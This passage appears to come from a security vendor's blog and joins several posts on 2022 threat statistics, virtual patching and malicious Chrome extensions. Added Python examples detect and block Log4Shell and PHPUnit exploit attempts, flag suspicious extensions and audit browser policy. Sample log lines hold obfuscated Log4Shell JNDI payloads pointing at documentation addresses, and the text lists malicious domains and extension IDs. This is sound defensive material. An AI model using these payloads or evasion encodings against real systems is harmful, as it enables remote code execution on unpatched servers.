Cato Analyzes the Dominant Sources of Threats in 2H2022 Research Report
We recently issued the Cato Networks SASE Threat Research Report, which highlights cyber threats and trends based on more than 1.3 trillion flows that passed through the Cato SASE Cloud network during the second half of 2022. The report highlights the most popular vulnerabilities that threat actors attempted to exploit, and the growing use of consumer applications that may present a risk to the enterprise.
Cato Scans a Vast Trove of Data to Hunt for Threats
One of the first observations in the report was the sheer scale of our data repository. Cato’s convergence of networking and security provides unique visibility on a global scale into both legitimate enterprise network usage and the malicious activity aimed at enterprise networks. This includes hostile network scans, exploitation attempts, and malware communication to C&C servers.
Like many security vendors, we collect information from threat intelligence feeds and other security resources. But as a networking provider, we are also able to enrich our understanding of security events with network flow data that is often unavailable to security professionals. During 2022, Cato’s data repository was fed by more than 2.1 trillion network flows traversing our global private backbone, with flow volume growing about 20% each quarter.
Security events, threats, and incidents also grew in proportion to the number of network flows. In the second half of 2022, the Cato Threat Hunting System (CTHS) detected 87 billion security events across the entire Cato Cloud. A security event is any network flow that triggers one of Cato’s many security controls.
CTHS is a natural extension of Cato Cloud security services. It consists of a set of algorithms and procedures developed by Cato Research Labs that dramatically reduce the time to detect threats across enterprise networks. CTHS is highly accurate and requires no additional infrastructure on a customer’s network.
CTHS concluded there were 600,000 threats, or high-risk flows, based on machine learning and data correlation. Of these, 71,000 were actual incidents, or verified security threats.
Cato Identifies the Top Threats and Exploit Attempts on the Network
Over the years, Cato has been tracking the top threats on the network and the trends haven’t changed much. The top five threat types in the current research report are (1) Network Scan, at 31.2 billion events, (2) Reputation, at 4.7 billion events, (3) Policy Violation, at 1.3 billion events, (4) Web Application Attack, at 623 million events, and (5) Vulnerability Scan, with 482 million events.
Other types of threats worth noting include Remote Code Execution (92 million), Crypto Mining (56 million), and Malware (55 million). Remote Code Execution events and Malware events both increased over the previous reporting period, but Crypto Mining events decreased. This latter fact may be due to the recent decline in the cryptocurrency business itself following the collapse of the FTX exchange.
The most-used cloud apps in the reporting period were from Microsoft, Google, Apple, Amazon (AWS), and Meta (Facebook). Many consumer-oriented applications were also in use, including YouTube, TikTok, Spotify, Tor, Mega, and BitTorrent. The latter three apps are known to be used frequently for malicious activities and pose a potential risk to enterprise networks.
The Log4j vulnerability (CVE-2021-44228, also known as Log4Shell) is a relatively recent discovery that is estimated to have affected nearly a third of all web servers in the world. Thus, it is no surprise that it continues to dominate exploitation attempts, with 65 million events across the Cato Cloud network. What is surprising is that two older vulnerabilities continue to make the top five list for exploit attempts. One is CVE-2017-9841, a remote code execution bug in PHPUnit from 2017, and the other is CVE-2009-2445, a 14-year-old vulnerability affecting certain popular web servers.
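The two most-attempted CVEs above are easy to spot in web server logs once obfuscation is undone, which is what the following added example does. It is not code from the report or from Cato; it is a small detector that normalizes Log4j lookup tricks (nested `${lower:...}` and `${...:-x}` default-value lookups, single and double URL encoding) before matching the `${jndi:` trigger of CVE-2021-44228, and matches the `eval-stdin.php` path that CVE-2017-9841 exploit attempts request. The log lines are constructed for the example, the IP addresses are documentation ranges, and the signature list is deliberately not exhaustive (CVE-2009-2445 is not covered here).

```python
import re
from collections import Counter
from urllib.parse import unquote

# Attackers hide the "${jndi:" trigger of CVE-2021-44228 behind nested Log4j lookups,
# e.g. ${${lower:j}ndi:...} or ${j${::-n}di:...}, and behind URL encoding.
# The two patterns below undo the most common tricks; the list is not exhaustive.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.I)  # ${lower:j} -> j
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")              # ${x:-j} / ${::-j} -> j

# Request text that indicates an exploitation attempt, keyed by the CVE it targets.
SIGNATURES = {
    "CVE-2021-44228": re.compile(r"\$\{\s*jndi\s*:"),
    "CVE-2017-9841": re.compile(r"/vendor/phpunit/phpunit/src/util/php/eval-stdin\.php"),
}


def normalize(text, rounds=10):
    """Undo URL encoding and nested lookups so obfuscated payloads match plain signatures."""
    text = unquote(unquote(text))  # single and double encoding
    for _ in range(rounds):  # bounded, so pathological input cannot loop forever
        new = _DEFAULT_VALUE.sub(r"\1", _CASE_LOOKUP.sub(r"\1", text))
        if new == text:
            break
        text = new
    return text.lower()


def classify(log_line):
    """Return the CVE IDs whose signature appears anywhere in the normalized log line."""
    norm = normalize(log_line)
    return [cve for cve, sig in SIGNATURES.items() if sig.search(norm)]


def count_exploit_attempts(lines):
    """Event count per CVE, the way the report tallies exploitation attempts."""
    counts = Counter()
    for line in lines:
        counts.update(classify(line))
    return counts


# Constructed Apache combined-format lines for the example (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Dec/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Dec/2022:10:00:02 +0000] "GET /?x=${jndi:ldap://198.51.100.9:1389/a} HTTP/1.1" 200 0 "-" "curl/7.68"',
    '198.51.100.9 - - [01/Dec/2022:10:00:03 +0000] "GET / HTTP/1.1" 200 0 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.9/x}"',
    '198.51.100.9 - - [01/Dec/2022:10:00:04 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.44 - - [01/Dec/2022:10:00:05 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "-" "python-requests/2.28"',
    '192.0.2.44 - - [01/Dec/2022:10:00:06 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 0 "-" "-"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), line[:60])
    print(count_exploit_attempts(SAMPLE_LOG))
```

The third and fourth sample lines would slip past a naive `"${jndi:"` substring match; the normalization step is what makes the count agree with what an attacker actually sent. The user-agent line matters too: Log4Shell fires on any logged string, not only on the query.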
Cato also tracks network flows associated with MITRE ATT&CK techniques. Network-based scanning and remote system discovery lead the list with 22.6 billion flows and 17 billion flows, respectively. The top five most-used techniques targeting enterprises are Phishing, Phishing for Information, Scanning, Remote System Discovery, and Exploit Public-Facing Application. Knowing which attack techniques are most often seen on the network can help organizations tighten their defenses where it is most needed.
For more detailed information, read the Cato Networks SASE Threat Research Report for the second half of 2022.
SASE in Manufacturing: Overcoming Security and Connectivity Challenges
Industry 4.0 is revolutionizing the manufacturing industry, as innovative technologies such as AI, IoT, and Robotic Process Automation (RPA) help manufacturers enhance their supply chains, logistics and production lines. While these operations are evolving into smart factories, the industry still faces challenges that could adversely impact its ability to realize the full potential of Industry 4.0.
Manufacturing Digital Transformation Challenges
Digital Transformation introduces a number of challenges to the manufacturing industry. These include:
Cybersecurity vulnerabilities - The manufacturing industry is especially vulnerable to cyberattacks. Legacy manufacturing systems were not designed to defend against modern-day attacks. Their legacy architecture makes it difficult to stay current on software patches and fixes, which exposes them to increased risk of security breaches. Additionally, without proper visibility and control of all traffic flows it is virtually impossible to respond to and remediate threats to the environment rapidly.
Lack of flexible, scalable and reliable architectures - Manufacturers require a flexible, scalable and reliable architecture that can easily and cost-effectively scale as the business grows. This is something that MPLS does not provide because it cannot support the cloud evolution that the manufacturing industry is experiencing. Additionally, global expansion is a major challenge due to the cost and complexity of turning up new sites, especially in locations where MPLS is not easy for carriers to offer and support. And while some may deploy SD-WAN to overcome this, it is not suitable for global use cases, something the industry demands.
Cloud Performance - MPLS makes connecting directly to third-party SaaS applications impractical for two key reasons: MPLS is a point-to-point technology, whereas SaaS traffic flows between the enterprise and cloud providers, so it is not a natural fit for cloud use; and SaaS apps like Microsoft 365, FactoryTalk, SAP and others require high-performance internet access, which MPLS does not provide.
Complicated tool management - Maintaining and monitoring multiple MPLS connections, telecom vendors, and legacy tools is extremely complicated, frustrating and prone to errors. This becomes even more challenging when integrating technology from acquisitions.
Global disconnect - Most manufacturers have global operations, with their HQ, production, engineering, suppliers and sales dispersed across the globe. All these users need secure, high-performance local, remote and global access to enable the business to run, which is hard to deliver over MPLS.
The Solution to Manufacturing Challenges: SASE
SASE (Secure Access Service Edge) is an innovative approach to networking and security that converges these technologies into a single, global, cloud-native service that enables enhanced security, consistent policy enforcement, and faster threat response times. With SASE, manufacturers can overcome the above-mentioned challenges that plague many factories during their digital transformation journey.
To support this journey, manufacturers need a new solution: SASE. With SASE, enterprise networking and security technologies are converged into a single cloud-native software stack and delivered over a global backbone where all capabilities operate in unison. SASE allows manufacturers to reduce the risk of cybersecurity breaches while delivering reliable, low latency, global access to applications and systems. The following capabilities are crucial for SASE to deliver on its promise:
A Single Network Architecture
SASE, having its own global backbone, enables authorized users, locations, clouds and applications to reliably and consistently connect at any time and from anywhere in the world.
The SASE cloud enables IT teams to instantly scale, optimize and enhance the network according to business requirements, and this ensures reliable and predictable performance for applications and a rich experience for all users.
Cloud Data Architecture
SASE optimizes traffic and routes it along the best path to its destination based on WAN optimization and dynamic routing policies. This ensures low latency cloud access for all users.
SASE strengthens the security posture by providing all required security capabilities including Zero Trust Network Access (ZTNA), firewall-as-a-service (FWaaS), cloud-access security broker (CASB), DLP and secure web gateway (SWG).
ZTNA in SASE ensures only authenticated and authorized users and devices gain access to critical enterprise business applications. To further extend security protection and coverage, Managed Detection and Response (MDR) is also available.
Consistent Access for Mobile Users and Suppliers
All authorized users receive consistent access, performance, and security no matter where they are.
What’s Next for Manufacturers?
SASE allows manufacturers to focus their time and resources on key business initiatives such as global expansion and enhancing factory operations instead of worrying about IT and security. This allows them to do what they do best, while maintaining peace of mind that their network and security needs are covered.
To learn more about SASE and manufacturing, listen to the podcast episode “How to implement SASE in manufacturing: A discussion with PlayPower”.
December 20, 2022
New Critical Vulnerability Underscores the Need for Virtual Patching
A new vulnerability underscores the need for virtual patching. The vulnerability, found in FortiOS, would allow a Remote Code Execution (RCE) attack on multiple firewall products as well as FortiGate SSL VPN. The vulnerability has reportedly already been exploited by threat actors. Fortinet has issued a patch for this vulnerability.
The vulnerability, which was initially reported on December 9th, received a score of 9.3 (Critical) and Fortinet has confirmed at least one instance of it being exploited.
Any vulnerability in a system is a potential entry point for a threat actor and must be patched immediately, especially critical vulnerabilities like this one. Threat actors have been known to weaponize such vulnerabilities quickly and exploit unpatched systems, while in many cases systems remain unpatched for a very long time, giving even slower-paced adversaries opportunities to exploit them. Vulnerabilities such as Log4j, which coincidentally is “celebrating” its first anniversary, are still being used by different adversaries to target unpatched systems and gain access to networks. Why? Because patching is so hard.
The Need for Virtual Patching
Having to identify, connect (or physically go to), patch, and test multiple boxes in multiple locations every time a new vulnerability is discovered is no small feat. Organizations need to perform this process very quickly whenever a new vulnerability is discovered as threat actors move quickly on such opportunities.
In addition, adversaries do not shy away from utilizing old vulnerabilities that still work. Log4j is one example but not the only one. CISA addressed this in their “Top Routinely Exploited Vulnerabilities” alert, writing, “CISA, ACSC, the NCSC, and FBI assess that public and private organizations worldwide remain vulnerable to compromise from the exploitation of these CVEs. Malicious cyber actors will most likely continue to use older known vulnerabilities, such as CVE-2017-11882 affecting Microsoft Office, as long as they remain effective and systems remain unpatched. Adversaries’ use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known.“
The solution to this problem is a cloud-based security architecture that allows for virtual patching. Virtual patching is defined by OWASP as “A security policy enforcement layer which prevents the exploitation of a known vulnerability. The virtual patch works since the security enforcement layer analyzes transactions and intercepts attacks in transit, so malicious traffic never reaches the web application. The resulting impact of a virtual patch is that, while the actual source code of the application itself has not been modified, the exploitation attempt does not succeed.”
Only a cloud-based security solution eliminates the need to patch box-by-box and effectively enables a “mitigate-once-protect-everywhere" patching strategy.
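The OWASP definition above describes an enforcement layer that inspects transactions in transit and drops exploit attempts before they reach an unmodified application. The following added example (not Cato's product code, and not from OWASP) shows that shape in miniature: a WSGI middleware that applies one rule set, keyed by CVE, in front of two separate stand-in applications, so a rule written once protects both. The single rule here is for CVE-2017-9841 (PHPUnit's `eval-stdin.php`, which evaluates the request body as PHP when it is left reachable under `vendor/`); the two "legacy" applications are placeholders that simply echo the path and are assumed to be unpatched.

```python
import io
import re
import sys
from urllib.parse import unquote

# Rules keyed by the CVE they mitigate: (HTTP methods, or None for any; regex over the
# decoded request path and query). Adding a rule here is the "mitigate once" step.
RULES = {
    "CVE-2017-9841": (None, re.compile(r"/vendor/phpunit/phpunit/src/util/php/eval-stdin\.php", re.I)),
}


def matched_rule(environ, rules=RULES):
    """Return the CVE of the first rule the request matches, or None."""
    target = unquote(environ.get("PATH_INFO", "")) + "?" + unquote(environ.get("QUERY_STRING", ""))
    method = environ.get("REQUEST_METHOD", "GET").upper()
    for cve, (methods, pattern) in rules.items():
        if (methods is None or method in methods) and pattern.search(target):
            return cve
    return None


class VirtualPatch:
    """WSGI middleware: the enforcement layer sits in front of the application, so a
    matching request is rejected before the unmodified application ever sees it."""

    def __init__(self, app, rules=RULES):
        self.app, self.rules = app, rules

    def __call__(self, environ, start_response):
        cve = matched_rule(environ, self.rules)
        if cve:
            body = f"request blocked by virtual patch for {cve}\n".encode()
            start_response("403 Forbidden", [("Content-Type", "text/plain"),
                                             ("Content-Length", str(len(body)))])
            return [body]
        return self.app(environ, start_response)


def make_legacy_app(name):
    """Stand-in for an unpatched application; it only echoes what it was asked for."""
    def app(environ, start_response):
        body = f"{name} handled {environ['PATH_INFO']}\n".encode()
        start_response("200 OK", [("Content-Type", "text/plain"),
                                  ("Content-Length", str(len(body)))])
        return [body]
    return app


def send(app, method, path, query=""):
    """Drive a WSGI app in-process (no network) and return (status, body)."""
    environ = {"REQUEST_METHOD": method, "PATH_INFO": path, "QUERY_STRING": query,
               "SERVER_NAME": "localhost", "SERVER_PORT": "80", "SERVER_PROTOCOL": "HTTP/1.1",
               "wsgi.version": (1, 0), "wsgi.url_scheme": "http", "wsgi.input": io.BytesIO(b""),
               "wsgi.errors": sys.stderr, "wsgi.multithread": False,
               "wsgi.multiprocess": False, "wsgi.run_once": False}
    status = {}

    def start_response(value, headers, exc_info=None):
        status["value"] = value

    body = b"".join(app(environ, start_response))
    return status["value"], body


# One rule set, two protected applications: the "protect everywhere" step.
PROTECTED = [VirtualPatch(make_legacy_app("app-a")), VirtualPatch(make_legacy_app("app-b"))]

if __name__ == "__main__":
    for app in PROTECTED:
        print(send(app, "GET", "/index.php"))
        print(send(app, "POST", "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"))
```

Two caveats a practitioner would add: the rule matches on the decoded path, because the encoded and the decoded forms must be treated the same or the patch is trivially bypassed; and a virtual patch buys time, it does not replace the real fix, which for this CVE is not shipping development dependencies such as PHPUnit to production at all.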
Spring4Shell Might Grab Headlines, But Log4j Exploits Swamped Enterprises, Finds Cato Threat Report
Log4j is a ubiquitous Java-based logging library that is said to be used by nearly 13 billion devices worldwide. Late last year, in December 2021, the Apache Software Foundation announced the discovery of a software vulnerability (CVE-2021-44228, a.k.a. Log4Shell) that allows unauthenticated attackers to execute arbitrary code remotely on any application that logs attacker-controlled input, simply by sending crafted web requests. As soon as the vulnerability was announced, researchers at Cato Networks noted over 3 million attempts (in Q4 2021) aimed at exploiting this vulnerability.
Fast forward to Q1 2022 and the number of attempts to exploit this vulnerability has increased to a whopping 24 million. According to the Cato Networks SASE Threat Research Report, Log4j vulnerabilities were leveraged all across the world, including in cyber-attacks on Ukrainian organizations.
Interestingly, number two on the list of the top five CVE exploit attempts was a Java web server vulnerability (CVE-2009-2445) that has been around for more than a decade. Threat actors made almost 900,000 attempts (double the previous quarter) to exploit this vulnerability for initial access. The research highlights the fact that while certain zero-day vulnerabilities (like Spring4Shell, CVE-2022-22965) grabbed news headlines, it is the legacy vulnerabilities that put enterprises at the most risk.
Majority of Exploitation Events Originated in the U.S.
Understanding where attacks originate from, and who (or where) the malware communicates with, is a critical part of any organization's threat response strategy. Attackers are aware that traffic to or from certain countries may be blocked, inspected or investigated, which is why a majority of them host their command and control (C&C) infrastructure in a country that is labeled as “safe”. The U.S. is the most favored hosting location (17.3 billion flows to C&C servers hosted there), China comes second (2 billion), followed by Germany (1.66 billion), the UK (1.29 billion) and Japan (1 billion).
Reputation-based Threats, Brute Force and Remote Code Execution Attacks Skyrocket
After analyzing 26 billion security events across 350 billion network flows, Cato researchers noted a 33% decline in attackers attempting to perform network scans. That being said, network scans still reign as the number one threat type (10 billion plus attempts), followed by reputation-based threats (1.5 billion attempts) or security events that are triggered by inbound or outbound communications to known malicious destinations.
Reputation-based threats grew more than 100% over the previous quarter. In addition to this, the Cato Threat Hunting System also observed that crypto-mining numbers continue to climb, while brute force attacks and remote code execution attacks have nearly tripled in comparison to the previous quarter.
Attackers Are Frequently Scanning Network Hardware and Software For Initial Access
Cato carried out an analysis based on the MITRE ATT&CK framework and concluded that network-based scanning is the most frequently used attack vector to gain initial access in an enterprise environment. Active Scanning (T1595 - 6.9 billion flows), Network Service Discovery (T1046 - 4.1 billion flows) and Remote System Discovery (T1018 - 2.7 billion flows) are the top three techniques employed by attackers. That’s not all: once adversaries have initial access they collect data from local systems (T1005 - 9.5 million incidents), use valid accounts (T1078 - 6.9 million incidents) and try to brute force access if credentials are not available (T1110 - 6.9 million incidents).
Risks Are Also Originating from Popular Consumer Apps Like Telegram and TikTok
While many governments have raised privacy concerns around the use of TikTok and even attempted to censor its use, Cato research finds that most enterprises still continue to allow TikTok flows. In fact, use of this short-form video-sharing app grew by 10% over the previous quarter. In addition to this, use of the instant-messaging app Telegram more than tripled, probably due to the Ukraine-Russia crisis, and YouTube grew by 25%. Growth in such non-business, consumer apps operating on enterprise networks significantly widens the attack surface, exposing organizations and people to greater risk of being targeted with phishing and other social engineering schemes.
What Can Organizations Do To Protect Themselves?
While security isn’t one-size-fits-all, below are some general recommendations and best practices that can help:
Execute a detailed audit of every website, system and application on a regular basis. Prioritize critical risks and plug those loopholes proactively.
Patch all applications regularly and ensure they are running the most up-to-date software.
Replace security point solutions and legacy network services with a solution that is more converged (or holistic) like SASE. A convergence of networking and security provides unique visibility into network usage, hostile network scans, exploitation attempts and malware communication to C&C servers.
When organizations encounter zero-day vulnerabilities like Log4j, they must immediately implement virtual patching so that security teams can neutralize the threat and buy additional time until they are able to apply the necessary permanent fixes.
Train staff regularly so they do not fall prey to phishing and social engineering scams.
Try to restrict use of consumer applications (e.g., TikTok, Telegram) in enterprise environments, as this can significantly reduce risk and lower the possibility of an infection moving laterally.
Be vigilant, have reporting and monitoring processes in place, and be on guard for any changes in the attack surface.
Follow the link to get the full Q122 Cato Networks SASE Threat Research Report.
Threat Intelligence Feeds and Endpoint Protection Systems Fail to Detect 24 Malicious Chrome Extensions
Network data from hundreds of Cato customers suggests malware communication persists despite the use of legacy security controls, services, and detection methods
Cato Research Labs released new findings today identifying 24 malicious Chrome extensions and 40 malicious domains, all previously thought to be benign. Some extensions simply introduced adware, but others stole user credentials and may allow attackers to exfiltrate data or manipulate search results to lure users into downloading malware. None of the extensions or the domains had been reported as malicious by endpoint protection systems (EPPs) or threat intelligence (TI).
The fact these malicious extensions and domains went undetected underscores the limitations of legacy protection systems. Attackers can employ a wide range of techniques to avoid detection by EPPs and TI. As such, enterprises cannot assume updated defenses will protect them. Putting into place the security measures to detect the C&C server communications of a malicious Chrome extension, or any malware for that matter, will fill this gap.
Browsers: Today's Security Frontier
Everyone uses browsers, and it's this popularity that makes them particularly enticing targets for adversaries. Browser extensions provide fertile ground for attackers to access resources on client computers, often with broad permissions (such as reading and changing data on every site the user visits) that were granted once at install time.
Many researchers consider malicious extensions to be simply PUPs (Potentially Unwanted Programs) or adware, but malicious extensions can be far riskier than just showing ads. From manipulating search results to luring users to download malware to exfiltrating clipboard data or screenshots, malicious Chrome extensions pose a huge and growing risk for every enterprise. We saw this last fall with the Razy malware outbreak, which also involved a Chrome extension.
How Malicious Chrome Extensions Make Their Way Into Your Browser
Google does a good job identifying and blocking malicious Chrome extensions. The process of uploading a new extension to Google's Chrome Web Store typically takes several weeks while the extension code and activity are reviewed automatically and manually by Google. Using the Chrome browser's standard security settings will block the installation of extensions from outside Google's Chrome Web Store. However, users can change this setting in the browser configuration.
Google also reviews abuse notifications from users and removes extensions identified as malicious from the Chrome Web Store. In those cases, the Chrome browser will mark the extension as malware; users are expected to remove the extension.
Figure 1: The Great Suspender is flagged as an extension that contains malware.
Endpoint Protection and Threat Intelligence Research Alone Do Not Detect Malicious Chrome Extensions
With those security controls in place and companies already investing heavily in endpoint protection, you might think that users would be safe from malicious extensions. However, our research shows this is not the case.
Overall, we discovered 85 malicious Chrome extensions on our customer networks. Some had never appeared in the Google Chrome Web Store, while others had been removed by Google. Nevertheless, they were still found operating on customer networks.
How can users continue to run malicious extensions despite the many security controls? During our research, we identified four approaches attackers use to introduce malicious extensions into user browsers:
Browser Configuration and Third-Party Sites: Some extensions enter browsers due to poor browser configuration combined with downloading a CRX (Chrome extension installation file) from a malicious site, i.e., a site other than Google's official web store. One malicious site we identified that distributes malicious CRXs is https://extore[.]space/inspire. Some of the extensions there are real and benign, while others are fake copies carrying malicious code.
Malicious Code Injection During Update: In other cases, Google might have approved the extensions, but attackers later injected malicious code in one of the extension's updates after the extension becomes popular.
Extension Rights Acquisition: Adversaries also purchase the rights to a popular extension from its developer and then inject malicious code. Taking over the developer's signing key and store credentials is another way to get plugged into a popular extension: the extension ID is derived from the extension's public key, so whoever holds the key can publish updates under the same, already-trusted ID.
Independent Code Downloads: We've also identified other malware, PUPs or malicious extensions that download and install additional malicious extensions.
Network-Based Discovery Is Critical for Spotting Malicious Extensions
Cato made these discoveries by analyzing five days of data from hundreds of Cato customers' networks. Rather than hunting for specific malware signatures, Cato uses a network-based approach that identifies the network traffic patterns indicative of all malware. As such, this methodology is not only useful for identifying these specific extensions but for continuously hunting for any malware communicating with a C&C server.
The research had two phases. First, we automatically correlated network traffic with extension behavior and then preliminarily classified extensions as malicious or benign. The result: 97 of 551 unique extensions from our data were identified as likely being malicious. The second phase was to manually inspect each extension, definitively classifying them as malicious or benign. The final result was 85 malicious extensions, representing an 87% success rate for our initial automated phase.
We achieved this by analyzing and correlating networking and security information across multiple dimensions, including looking for:
Traffic to Parked or Malicious Domains. Identifying traffic generated by extensions to parked domains or malicious domains typically yielded known malicious extensions. What's more, by checking the network behavior and other traffic data, such as the URL and other HTTP parameters, we were able to identify other malicious extensions that were using the same behavior and communicating with domains previously not classified as malicious.
Figure 2: Parked domain used as a C&C server
Identical Extensions Communicating with Different Domains: Attackers have identical extensions (as defined by their unique extension ID) communicating with many different domains. They'll target a particular area (creating PDFs was particularly popular), labeling each extension differently and having them communicate with a different domain, mimicking a benign extension's behavior. Using the same approach, we analyzed different extensions that communicate to the same domain. This behavior was suspicious, and after analyzing the specific extensions, they were identified as malicious.
Unencrypted Extension IDs: Having the extension ID in clear-text or encoded to base64 in the URL, headers or payload is also suspicious. It may be evidence of the adversaries trying to understand the traffic origin (as sometimes they share the same domain across many extensions). It might also be used as an access-control function on the server-side to allow traffic only from the extension and not from security researchers or automatic web-classification algorithms trying to investigate and classify the domain.
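The three correlation dimensions above can be expressed as a small analysis over flow records attributed to extensions. The following is an added example, not Cato's detection code: it flags traffic to parked domains, one extension ID talking to many domains, several different extension IDs sharing one domain, and an extension's own ID appearing in clear text or base64 in the URL or headers. The record format, the parked-domain set and the extension IDs and hostnames are constructed placeholders; only the ID format (32 letters a to p) is Chrome's real one.

```python
import base64
import binascii
import re
from collections import defaultdict
from dataclasses import dataclass, field

EXT_ID = re.compile(r"\b[a-p]{32}\b")              # Chrome extension IDs: 32 letters a-p
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long enough to hold a base64 ID (44 chars)


@dataclass
class Flow:
    """One HTTP request attributed to a browser extension (constructed record format)."""
    ext_id: str                 # originating extension, from endpoint/browser telemetry
    host: str                   # destination host
    path: str                   # request path and query string
    headers: dict = field(default_factory=dict)


def ids_in_text(text):
    """Extension IDs carried in clear text or as base64 inside a URL, header or payload."""
    found = set(EXT_ID.findall(text))
    for run in B64_RUN.findall(text):
        try:
            decoded = base64.b64decode(run, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if EXT_ID.fullmatch(decoded):
            found.add(decoded)
    return found


def analyse(flows, parked_domains, many_domains=3):
    """Apply the correlation dimensions described above; returns {ext_id: [reasons]}."""
    ext_domains, domain_exts, reasons = defaultdict(set), defaultdict(set), defaultdict(set)
    for f in flows:
        ext_domains[f.ext_id].add(f.host)
        domain_exts[f.host].add(f.ext_id)
        if f.host in parked_domains:
            reasons[f.ext_id].add(f"traffic to parked domain {f.host}")
        wire = f.path + " " + " ".join(f"{k}: {v}" for k, v in f.headers.items())
        if f.ext_id in ids_in_text(wire):
            reasons[f.ext_id].add("own extension ID exposed in request")
    for ext, domains in ext_domains.items():
        if len(domains) >= many_domains:
            reasons[ext].add(f"one extension ID talking to {len(domains)} distinct domains")
    for host, exts in domain_exts.items():
        if len(exts) >= 2:
            for ext in exts:
                reasons[ext].add(f"domain {host} shared by {len(exts)} different extensions")
    return {ext: sorted(r) for ext, r in reasons.items()}


# Constructed sample data: IDs and domains are placeholders, not observed indicators.
EXT_A, EXT_B, EXT_C, EXT_D = "abcdefghijklmnop" * 2, "b" * 32, "c" * 32, "d" * 32
PARKED = {"cdn-stats-update.example"}  # stand-in for a parked-domain classification feed
SAMPLE_FLOWS = [
    Flow(EXT_D, "docs-pdf-helper.example", "/v1/ping"),                 # benign: nothing unusual
    Flow(EXT_A, "cdn-stats-update.example", "/__utm.gif"),               # parked domain as C&C
    Flow(EXT_A, "cfg-sync-one.example", "/c"),
    Flow(EXT_A, "cfg-sync-two.example", "/c"),                           # same ID, many domains
    Flow(EXT_B, "pdf-convert-api.example", f"/init?ext={EXT_B}"),        # clear-text ID in URL
    Flow(EXT_C, "pdf-convert-api.example", "/init",
         {"X-Client": base64.b64encode(EXT_C.encode()).decode()}),       # base64 ID in header
]

if __name__ == "__main__":
    for ext, why in analyse(SAMPLE_FLOWS, PARKED).items():
        print(ext, why)
```

Each dimension alone produces false positives (a legitimate extension may use a CDN shared with others), which is why the result carries the list of reasons per extension rather than a verdict: the manual second phase described in the research is where the verdict is made.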
Fake Postman Extension Leads to Credential Theft
While our approach identified many extensions that were believed to be benign, of particular note was one extension that disguised itself as the popular Postman application.
Postman allows developers to test and use APIs, typically entering API keys and other credentials in the process. The fake Postman extension lets attackers harvest those credentials and use them against the company's applications. To make matters worse, the malicious extension closely mimics the real Postman extension, even using the same icon and offering the same capabilities.
Figure 3: Fake Postman extension download
Figure 4: Obfuscated JS code in the Postman copycat extension. The variable p returns https://secure.browser-status[.]com/__utm.gif, which is a tracking pixel.
Recommendations for Organizations
Cato recommends taking several actions to protect your users from these and other malicious extensions:
Define and maintain an allowlist policy of the extension IDs permitted in your organization, and block everything else. Ensure allowlisted extensions come from Google's Chrome Web Store only.
Monitor for browsers with poor security settings (lower than "Standard").
Monitor network traffic to identify periodic communication with C&C servers.
Despite their investment in EPP and TI, enterprises continue to be infected by malicious Chrome extensions. Attackers introduce the extensions through a range of techniques bypassing legacy protection approaches. However, rather than hunting for a specific malicious extension, enterprises can best protect themselves by identifying the unique network patterns indicative of all malware.
Malicious extension IDs identified in this research:
djdcfiocijfjponepmbbdmbeblofhfff (Fake Postman)
mfdcjdgkcepgfcfgbadbekokbnlifbko (Fake Postman)
mgkmlkgpnffmhhfallpoknfmmkdkfejp (QuickNewsWorld Promos)
pdlfbopkggkgdmgkejgjgnbdbmfcnfjn (EZPackageTracking Promos)
ljnppgaebjnbbahgmjajfbcoabdpopfb (Search Manager)
nofdiclilfkicekdajkiaieafeciemlh (Your Docs To PDF)
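The first two recommendations above (an allowlist of Web Store extension IDs, and watching for browsers whose protection is set below Standard) can be checked mechanically against Chrome's managed policy and an inventory of installed extensions. The following added example does that; it is not Cato's tooling. It assumes the real Chrome enterprise policy names ExtensionInstallBlocklist, ExtensionInstallAllowlist, ExtensionInstallSources and SafeBrowsingProtectionLevel (0 = none, 1 = Standard, 2 = Enhanced), and the Chrome Web Store update URL that Web Store extensions carry in their manifest. The weak and hardened policy documents and the endpoint inventory are constructed; the known-malicious IDs are the ones listed above.

```python
import re

EXT_ID = re.compile(r"^[a-p]{32}$")  # Chrome extension IDs: 32 letters a-p
WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"  # Web Store update_url

# Extension IDs published in the post above.
KNOWN_MALICIOUS = {
    "djdcfiocijfjponepmbbdmbeblofhfff": "Fake Postman",
    "mfdcjdgkcepgfcfgbadbekokbnlifbko": "Fake Postman",
    "mgkmlkgpnffmhhfallpoknfmmkdkfejp": "QuickNewsWorld Promos",
    "pdlfbopkggkgdmgkejgjgnbdbmfcnfjn": "EZPackageTracking Promos",
    "ljnppgaebjnbbahgmjajfbcoabdpopfb": "Search Manager",
    "nofdiclilfkicekdajkiaieafeciemlh": "Your Docs To PDF",
}


def audit_policy(policy):
    """Check a Chrome managed-policy document (as a dict) against the recommendations above."""
    findings = []
    if "*" not in policy.get("ExtensionInstallBlocklist", []):
        findings.append("ExtensionInstallBlocklist lacks '*': anything not explicitly blocked may be installed")
    for ext in policy.get("ExtensionInstallAllowlist", []):
        if not EXT_ID.match(ext):
            findings.append(f"allowlist entry {ext!r} is not a valid extension ID")
        elif ext in KNOWN_MALICIOUS:
            findings.append(f"allowlist contains known-malicious {ext} ({KNOWN_MALICIOUS[ext]})")
    if policy.get("ExtensionInstallSources"):
        findings.append("ExtensionInstallSources is set: CRX installs from outside the Chrome Web Store are permitted")
    level = policy.get("SafeBrowsingProtectionLevel")
    if level is None:
        findings.append("SafeBrowsingProtectionLevel not enforced by policy: users can lower it")
    elif level < 1:
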